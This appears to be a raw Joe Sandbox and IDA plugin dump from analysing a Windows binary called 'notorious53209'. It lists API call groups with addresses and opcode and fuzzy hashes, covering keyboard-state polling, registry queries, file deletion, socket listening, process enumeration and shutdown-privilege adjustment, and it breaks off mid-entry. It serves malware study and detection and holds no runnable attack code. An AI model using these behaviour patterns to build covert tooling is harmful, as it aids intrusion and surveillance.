                                                  • Opcode ID: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                                                  • Instruction ID: bc71180da7f2b1d62bfcd1d9cbfd02470ea2e11bac71063307b2e61e993c1a5d
                                                  • Opcode Fuzzy Hash: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                                                  • Instruction Fuzzy Hash: 77726D71E00219DBDF24DF58C8947AEB7B5FF48314F18816AE859EB394EB309981CB90
                                                  APIs
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900737
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009007D6
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0090086E
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900AAD
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900ABA
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 69a4eab826c2e4018065c97990aed0ab2238c2c75e611263964a96fa35377060
                                                  • Instruction ID: f1ba15ba4a41e4443e2a5e9b1113f78b6e3ca78f65e6a81934068bde0d55a3d5
                                                  • Opcode Fuzzy Hash: 69a4eab826c2e4018065c97990aed0ab2238c2c75e611263964a96fa35377060
                                                  • Instruction Fuzzy Hash: D3E12E71204210AFCB14DF29C895E6ABBE9FF89714F04896DF499D72A2DB30ED05CB52
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E0241
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 008E02C2
                                                  • GetKeyState.USER32(000000A0), ref: 008E02DD
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 008E02F7
                                                  • GetKeyState.USER32(000000A1), ref: 008E030C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 008E0324
                                                  • GetKeyState.USER32(00000011), ref: 008E0336
                                                  • GetAsyncKeyState.USER32(00000012), ref: 008E034E
                                                  • GetKeyState.USER32(00000012), ref: 008E0360
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 008E0378
                                                  • GetKeyState.USER32(0000005B), ref: 008E038A
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                                                  • Instruction ID: 03040ae3032a38d42f26c665fb19b94ef6e4b652406833fdde7159c4f5c3aaef
                                                  • Opcode Fuzzy Hash: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                                                  • Instruction Fuzzy Hash: 5D41BB245087C96EFF324A6598183B5BEE0FB13344F48489DD6C5C66C3D7D499C88FA1
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CoInitialize.OLE32 ref: 008F8718
                                                  • CoUninitialize.OLE32 ref: 008F8723
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00912BEC,?), ref: 008F8783
                                                  • IIDFromString.OLE32(?,?), ref: 008F87F6
                                                  • VariantInit.OLEAUT32(?), ref: 008F8890
                                                  • VariantClear.OLEAUT32(?), ref: 008F88F1
                                                  Strings
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 2f49a8678c3587c7f5f5031fd12832521cd1690fc16c84fe72d0c69f0251bb8b
                                                  • Instruction ID: 53a8c905cc3e83a3304c78eb13cd8bc410f0143e9816495f96412a47f680083c
                                                  • Opcode Fuzzy Hash: 2f49a8678c3587c7f5f5031fd12832521cd1690fc16c84fe72d0c69f0251bb8b
                                                  • Instruction Fuzzy Hash: 75617830618305DFD710EF24C848B6ABBE8FF88754F144829FA85DB291CB60ED44CB92
                                                  APIs
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                                                  • Instruction ID: b89c7669cfc068e88373e41286caf24293202f9d0bfeda4bf3b87476d8685817
                                                  • Opcode Fuzzy Hash: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                                                  • Instruction Fuzzy Hash: 5B21D3352152289FDB20AF68EC59F7A77A8FF04310F148016F946DB261DB71AD00DB85
                                                  APIs
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                    • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008E3ADF
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E3B87
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E3B9A
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E3BB7
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BD9
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E3BF5
                                                  Strings
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 2db68a4555834e728db67b68d384beb9f546e2020cbc3a96e339c892a4e3766a
                                                  • Instruction ID: 12b8ad53567dc19553f188e471a2c20783d1c7bb46543a3b689d75788f9896ed
                                                  • Opcode Fuzzy Hash: 2db68a4555834e728db67b68d384beb9f546e2020cbc3a96e339c892a4e3766a
                                                  • Instruction Fuzzy Hash: 46518C318041999ACB15FBA5CE968EDB7B8FF55300F2441A9E442B7091EF30AF09CB62
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF6AB
                                                  • Sleep.KERNEL32(0000000A), ref: 008EF6DB
                                                  • _wcscmp.LIBCMT ref: 008EF6EF
                                                  • _wcscmp.LIBCMT ref: 008EF70A
                                                  • FindNextFileW.KERNEL32(?,?), ref: 008EF7A8
                                                  • FindClose.KERNEL32(00000000), ref: 008EF7BE
                                                  Strings
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: b93f0816b15e780ddf6f3fbdf06535aeb8a53211460819fd18b23ab3e35204d8
                                                  • Instruction ID: cf10448efb3e079526449cb997e4cf6ea894aa01f524b1ce5314a4f37b384da7
                                                  • Opcode Fuzzy Hash: b93f0816b15e780ddf6f3fbdf06535aeb8a53211460819fd18b23ab3e35204d8
                                                  • Instruction Fuzzy Hash: 2C41907190025AAFCF11EF65CC85AEEBBB4FF06310F144566E914E21A1EB309E44CF91
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0090D78A
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0090D7AA
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0090D9E5
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090DA03
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090DA24
                                                  • ShowWindow.USER32(00000003,00000000), ref: 0090DA43
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090DA68
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0090DA8B
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                  • String ID:
                                                  • API String ID: 830902736-0
                                                  • Opcode ID: e7d54546bd56ca5288f8ec1da3fc0e588154f41a3b14c9d30968e63149b3aca7
                                                  • Instruction ID: 2dacf28dacbd89d48c97aa66b1a203fbf307424370e562bdf57a414584d95f78
                                                  • Opcode Fuzzy Hash: e7d54546bd56ca5288f8ec1da3fc0e588154f41a3b14c9d30968e63149b3aca7
                                                  • Instruction Fuzzy Hash: EEB19A75601229EFDF14CFA8C9857BE7BB5FF44701F088069EC589B295D734AA90CB90
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-1546025612
                                                  • Opcode ID: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                                                  • Instruction ID: 6353fd4004a49c266cf5c6ce89cece58ec30df9a8dbaf5cca02dddd68a68ffc9
                                                  • Opcode Fuzzy Hash: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                                                  • Instruction Fuzzy Hash: 9BA26C70A0421ECBDF24DF58C990BADB7B1FB54314F2891AAD85AE7280D7349E86DF50
                                                  APIs
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: e0c8388e8e6d892c37b77fd54e82051eba4cc58a712d97f51995ae33da64a306
                                                  • Instruction ID: 3c6bb2b24976a4cfc95846c0c2880f1b3b3b261115abe78e2a23a86c2481fbcd
                                                  • Opcode Fuzzy Hash: e0c8388e8e6d892c37b77fd54e82051eba4cc58a712d97f51995ae33da64a306
                                                  • Instruction Fuzzy Hash: 7B129C70A00609EFDF14EFA8D985AAEB7F5FF48300F14462AE406E7291EB35AD11CB51
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • ReleaseCapture.USER32 ref: 0090C2F0
                                                  • SetWindowTextW.USER32(?,00000000), ref: 0090C39A
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0090C3AD
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0090C48F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 973565025-2107944366
                                                  • Opcode ID: 28cb6d1de840808662dd58b8a7237225e1fff936ff75d36cc59a28cc21c760d7
                                                  • Instruction ID: f36fc1ad19be2ce0bf327de800fd1009fe703ccbdc32f9c0af9444594d04ebfe
                                                  • Opcode Fuzzy Hash: 28cb6d1de840808662dd58b8a7237225e1fff936ff75d36cc59a28cc21c760d7
                                                  • Instruction Fuzzy Hash: C751ABB4208304AFD714EF24CC95FAA7BE5FB89314F004A2DF5918B2E1DB71A948DB52
                                                  APIs
                                                    • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                    • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                    • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 008E549B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                                                  • Instruction ID: 56cb1578e5df8416e2cda65237d2f3acdd379b4d7035f371e9c8147061e4e638
                                                  • Opcode Fuzzy Hash: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                                                  • Instruction Fuzzy Hash: F70147B1669A496EF738627ADC5ABBA7258FB0274EF200131FC06D20C3DA504C808299
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 008F65EF
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F65FE
                                                  • bind.WS2_32(00000000,?,00000010), ref: 008F661A
                                                  • listen.WS2_32(00000000,00000005), ref: 008F6629
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6643
                                                  • closesocket.WS2_32(00000000), ref: 008F6657
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                                                  • Instruction ID: 666ef59afa52ee669cd77615881adc9146e0a5339c170b1967188963dccbc568
                                                  • Opcode Fuzzy Hash: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                                                  • Instruction Fuzzy Hash: B7219C312002189FCB10EF68CC95B7EB7A9FF48720F148269EA56E73D1DB74AD119B52
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • _memmove.LIBCMT ref: 008D062F
                                                  • _memmove.LIBCMT ref: 008D0744
                                                  • _memmove.LIBCMT ref: 008D07EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 0b5cdb850ba627759c77a02dd7ace1811839669ce13358d3d2f60cb0ccae7124
                                                  • Instruction ID: 5184199f539f31c4f2265cc596a3bcc12804596a7620a512589f1cabe14a97e5
                                                  • Opcode Fuzzy Hash: 0b5cdb850ba627759c77a02dd7ace1811839669ce13358d3d2f60cb0ccae7124
                                                  • Instruction Fuzzy Hash: 1D026F70A00209EBDF15EF68D985AAE7BB5FF44300F14816AE806EB355EB31DA51CF91
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008819FA
                                                  • GetSysColor.USER32(0000000F), ref: 00881A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                                    • Part of subcall function 00881290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ColorDialogNtdllProc_$LongWindow
                                                  • String ID:
                                                  • API String ID: 591255283-0
                                                  • Opcode ID: 1d3feafff87b1d8234a88034533146eb255147fc51862139d6c233c9cf4ebb70
                                                  • Instruction ID: 567748f7d4e11a7d2fc75ba7b60fe36b4f552089b85af8b2fa6373268a6e6aec
                                                  • Opcode Fuzzy Hash: 1d3feafff87b1d8234a88034533146eb255147fc51862139d6c233c9cf4ebb70
                                                  • Instruction Fuzzy Hash: C6A116B1116568BEDE3CBB28CC5DEBB399CFB82759B14021AF402D62D2DE549D039372
                                                  APIs
                                                    • Part of subcall function 008F80A0: inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 008F6AB1
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6ADA
                                                  • bind.WS2_32(00000000,?,00000010), ref: 008F6B13
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6B20
                                                  • closesocket.WS2_32(00000000), ref: 008F6B34
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 4d5af192f901f5c9f02595347a3e0693bd8d465c4b6d61d3bb95afdd9c842b9f
                                                  • Instruction ID: f0fe22ede7d23ad6a7c39010756491a8fef9f0fabe8e83aaddd3bb4528cefa54
                                                  • Opcode Fuzzy Hash: 4d5af192f901f5c9f02595347a3e0693bd8d465c4b6d61d3bb95afdd9c842b9f
                                                  • Instruction Fuzzy Hash: 0741A275600214AFEB10BF68DC86F7E77A9FB44720F448158FA5AEB3D2DA709D018792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                                                  • Instruction ID: f0f083a82193cec9d8fa22e8d2a4e609d0dac43c137d98f2fd579798047a5cfd
                                                  • Opcode Fuzzy Hash: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                                                  • Instruction Fuzzy Hash: EF11C4323009256FE7216F26DC54A2F7B9CFF84721B464429F846D7281CB319E01CEA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: 329dcf747255ade4db14e321275ec9542491c678f231d6a1e2005965fef9a624
                                                  • Instruction ID: 0f64f7cce2e68cd74034a9c6162d10fdafa6899310514f84197411b6a2a13578
                                                  • Opcode Fuzzy Hash: 329dcf747255ade4db14e321275ec9542491c678f231d6a1e2005965fef9a624
                                                  • Instruction Fuzzy Hash: 362268716083019FDB24EF68C881B6AB7E4FF88704F18491DF59AD7291DB71EA04CB92
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 008FF151
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 008FF15F
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 008FF21F
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FF22E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: c0c8477061badb01978f2a7bd3a611b96b33de05f746efaeeb68c448cf54bd48
                                                  • Instruction ID: eeb23ea4bb59cb64b4c3d1844afae1e77c74e00bd917dc20586f8228e50e3678
                                                  • Opcode Fuzzy Hash: c0c8477061badb01978f2a7bd3a611b96b33de05f746efaeeb68c448cf54bd48
                                                  • Instruction Fuzzy Hash: A7515B715083109FD310EF24D885A6BB7E8FF94710F14482DF595D6252EB70AA08CB92
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetCursorPos.USER32(?), ref: 0090C7C2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090C7D7
                                                  • GetCursorPos.USER32(?), ref: 0090C824
                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BBBFB,?,?,?), ref: 0090C85E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
